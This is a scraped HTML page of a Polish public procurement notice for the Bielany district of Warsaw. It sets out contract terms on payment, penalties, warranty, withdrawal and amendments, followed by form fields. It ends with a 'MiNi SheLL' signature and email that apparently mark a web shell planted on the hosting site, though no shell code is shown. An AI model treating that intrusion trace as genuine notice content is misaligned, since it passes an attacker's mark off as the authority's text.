jedną fakturą VAT wystawioną na: nabywcę/podatnika - Miasto st. Warszawa, Pl. Bankowy 3/5, 00-950 Warszawa, NIP 525-22-48-481, których odbiorcą/płatnikiem będzie Dzielnica Bielany m. st. Warszawy, ul. S. Żeromskiego 29, 01-882 Warszawa, na podstawie protokołu odbioru końcowego.5.	Zapłata wynagrodzenia, o którym mowa w ust 1, zostanie uregulowana przelewem, na rachunek bankowy Wykonawcy nr ........................ w terminie 21 dni od daty otrzymania przez Zamawiającego, prawidłowo wystawionej faktury.6.	Za dzień zapłaty uważa się dzień, w którym nastąpiło obciążenie rachunku bankowego Zamawiającego. § 4.Kary umowne1.	Wykonawca zobowiązuje się zapłacić Zamawiającemu kary umowne:1)	za zwłokę w wykonaniu przedmiotu umowy w wysokości 0,5% wynagrodzenia brutto określonego w § 3 ust 1 niniejszej umowy, za każdy rozpoczęty dzień zwłoki;2)	z tytułu niewykonania umowy przez Wykonawcę, z przyczyn leżących po stronie Wykonawcy - w wysokości 10% wynagrodzenia brutto określonego w § 3 ust. 1 niniejszej umowy;3)	z tytułu odstąpienia od umowy w całości lub w części przez Zamawiającego, z przyczyn leżących po stronie Wykonawcy w wysokości 10 % wynagrodzenia brutto określonego w § 3 ust. 1 niniejszej umowy;4)	za nienależyte wykonanie przedmiotu umowy (z wadami) - w wysokości 20% wynagrodzenia brutto określonego w § 3 ust. 1 niniejszej umowy;5)	za zwlokę w usunięciu wad stwierdzonych przy odbiorze lub w okresie rękojmi i gwarancji w wysokości 0,3 % wynagrodzenia brutto ustalonego w § 3 ust. 1 umowy, za każdy rozpoczęty dzień zwłoki, liczonej od dnia wyznaczonego na usunięcie wad;6)	z tytułu odstąpienia od umowy w całości lub w części przez Wykonawcę z przyczyn nie leżących po stronie Zamawiającego, w wysokości 10% wynagrodzenia brutto określonego w § 3 ust. 1 umowy.2.	W przypadku szkody przekraczającej wysokość kar umownych Zamawiający zastrzega sobie prawo do dochodzenia odszkodowania na zasadach ogólnych.3.	Zapłacenie przez Wykonawcę kar umownych w przypadkach określonych w ust. 1 pkt 1, 4 i 5 nie zwalnia Wykonawcy z obowiązku ukończenia prac lub jakichkolwiek innych obowiązków i zobowiązań wynikających z umowy. 4.	Każda z kar umownych wymienionych w ust. 1 jest niezależna od siebie, a Zamawiający ma prawo dochodzić każdej z nich niezależnie od dochodzenia pozostałych.5.	Zamawiający zastrzega sobie prawo potrącenia kar umownych określonych w ust. 1 z przysługującego Wykonawcy wynagrodzenia, z wystawionej przez Wykonawcę faktury, na podstawie wystawionej noty księgowej, a Wykonawca na powyższe wyraża zgodę. § 5.Oświadczenie Wykonawcy1.	Wykonawca oświadcza że posiada niezbędną wiedzę i doświadczenie do wykonania przedmiotu umowy i zobowiązuje się do wykonania przedmiotu umowy z największą starannością, rzetelnie i terminowo.2.	Wykonawca oświadcza, że przy wykonywaniu przedmiotu umowy będzie wykorzystywał jedynie materiały, utwory, dane, informacje oraz programy komputerowe, które są zgodne z obowiązującymi przepisami prawa, a w szczególności nie naruszają dóbr osobistych, majątkowych i osobistych praw autorskich, praw pokrewnych, praw do znaków towarowych lub wzorów użytkowych bądź innych praw własności przemysłowej, a także danych osobowych i wizerunku osób trzecich. Gdyby doszło do takiego naruszenia, wyłączną odpowiedzialność względem osób których prawa zostały naruszone ponosi Wykonawca.3.	Przekazany przedmiot umowy będzie kompletny z punktu widzenia celu, dla którego ma służyć oraz zgodna z przepisami ustawy Prawo zamówień publicznych i aktami wykonawczymi.4.	Wykonawca oświadcza, że wykona przedmiot umowy przy udziale ..... (w sytuacji gdy wykonawca będzie polegał na zdolnościach technicznych podmiotów trzecich).5.	Przedmiot umowy nie stanowi utworu w rozumieniu Ustawy z dnia 4 lutego 1994 r. o prawie autorskim i prawach pokrewnych.§ 6.Osoby do kontaktu1.	Strony wyznaczają następujące osoby do kontaktu:1)	Ze strony Zamawiającego - ......................,2)	Ze strony Wykonawcy - ......................... .2.	Strony niniejszym upoważniają osoby wskazane w ust. 1 do podpisania protokołu odbioru przedmiotu umowy.§ 7.Odbiór przedmiotu umowy1.	Strony postanawiają, że przedmiotem odbioru końcowego będzie wykonanie całości przedmiotu umowy.2.	Wykonanie przedmiotu umowy będzie potwierdzone protokołem odbioru końcowego. 3.	W przypadku zaistnienia wady, jej usunięcie w ramach gwarancji nastąpi w terminie 5 dni od dnia zawiadomienia Wykonawcy o jej istnieniu dokonanego w formie pisemnej.4.	Po usunięciu wad przedmiot umowy zostanie odebrany przez Zamawiającego ponownie protokołem odbioru.5.	Wykonawca udzieli na przedmiot Umowy gwarancji na okres 12 miesięcy licząc od daty podpisania protokołu końcowego odbioru.6.	Dokumentem potwierdzającym warunki gwarancji będzie oświadczenie Wykonawcy który Wykonawca wyda Zamawiającemu przed podpisaniem protokołu końcowego odbioru.§ 8.Odstąpienie od umowy1.	Strony ustalają, iż Zamawiającemu przysługuje, w terminie do 15.07.2017 r., prawo odstąpienia od umowy bez wyznaczania dodatkowych terminów w przypadkach:1)	braku realizacji umowy w terminie określonym w § 2.2)	wykonywania przedmiotu umowy niezgodnie z § 1 umowy.2.	W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy lub dalsze wykonanie umowy może zagrozić istotnemu interesowi bezpieczeństwa państwa lub bezpieczeństwu publicznemu, Zamawiający może od umowy odstąpić w terminie 30 dni od dnia powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawcy będzie przysługiwało wynagrodzenie z tytułu wykonania części umowy.§ 9.Zmiana umowy 1.	Zmiany i uzupełnienia treści niniejszej umowy wymagają pod rygorem nieważności formy pisemnej, w postaci aneksu do umowy i muszą być akceptowane przez obie umawiające się Strony.2.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba, że zachodzi co najmniej jedna z okoliczności opisanych w art. 144 Pzp. 3.	Zamawiający dopuszcza zmiany postanowień umowy oraz określa warunki zmian:1)	zmiana albo rezygnacja z podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art. 22a ust. 1 P. z. p., w celu wykazania spełnienia warunków udziału w postępowaniu, Wykonawca jest obowiązany wykazać Zamawiającemu, że: proponowany inny podmiot lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podmiot, na którego zasoby Wykonawca powoływał się w trakcie postępowania o udzielenie zamówienia oraz iż brak jest podstaw wykluczenia tego podmiotu (w tym celu przedstawi oświadczenie, o którym mowa w art.25a ust.1 ustawy P.z.p.);2)	zmiana numeru konta bankowego Wykonawcy.4.	Formy aneksu nie wymagają zmiany danych adresowych Wykonawcy, osób do współpracy z obu Stron. Zmiany te nastąpią na podstawie jednostronnego, pisemnego powiadomienia.§ 10.Postanowienia końcowe1.	W sprawach nieuregulowanych niniejszą umową mają zastosowanie przepisy Kodeksu cywilnego, Prawa Zamówień Publicznych. 2.	Wszelkie sprawy sporne powstałe w związku z zawarciem niniejszej Umowy strony będą starać się załatwiać w pierwszej kolejności między sobą polubownie. 3.	W przypadku zaistnienia sporu i nie osiągnięcia przez strony porozumienia w drodze negocjacji, rozstrzygającym będzie Sąd Powszechny właściwy dla Zamawiającego. 4.	Wykonanie niniejszej umowy nie wiąże się z przetwarzaniem danych osobowych w rozumieniu ustawy o ochronie danych osobowych, dla których Administratorem Danych jest Prezydent Miasta Stołecznego Warszawy, a co za tym idzie nie wiąże się z dostępem do systemów informatycznych Urzędu m.st. Warszawy.5.	W przypadku nie powiadomienia przez Wykonawcę Zamawiającego o zmianie danych adresowych zawartych w umowie, wszelką korespondencję wysyłaną przez Zamawiającego, zgodnie z posiadanymi przez niego danymi, strony uznaje się za doręczoną.6.	Umowę sporządzono w dwóch jednobrzmiących egzemplarzach, po jednym dla każdej ze stron.7.	Integralną częścią umowy jest załącznik:nr 1 - Opis przedmiotu opracowania;nr 2 - Kserokopia wniosku wykonawcy;nr 3 - Raport z przeprowadzonej licytacji.</span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14">Zamawiający nie będzie żądać od Wykonawcy wniesienia zabezpieczenia należytego wykonaniaumowy.</span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">1. Zmiany zostały określone we wzorze umowy stanowiącym załącznik nr 1 do Ogłoszenia (orazrównocześnie zamieszczonym w sekcji IV - pkt 4) Ogłoszenia. 2. Zakazuje się istotnych zmianpostanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboruWykonawcy, chyba, że zachodzi co najmniej jedna z okoliczności opisanych w art. 144 Pzp. 3.Zamawiający dopuszcza zmiany postanowień umowy oraz określa warunki zmian: 1) zmiana alborezygnacja z podmiotu, na którego zasoby Wykonawca powoływał się na zasadach określonych w art.22a ust. 1 ustawy PZP, w celu wykazania spełnienia warunków udziału w postępowaniu, Wykonawcajest obowiązany wykazać Zamawiającemu, że: proponowany inny podmiot lub Wykonawcasamodzielnie spełnia je w stopniu nie mniejszym niż podmiot, na którego zasoby Wykonawcapowoływał się w trakcie postępowania o udzielenie zamówienia oraz iż brak jest podstaw wykluczeniatego podmiotu (w tym celu przedstawi oświadczenie, o którym mowa w art.25a ust.1 ustawy PZP); 2)zmiana numeru konta bankowego Wykonawcy.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data"></span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina"></span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com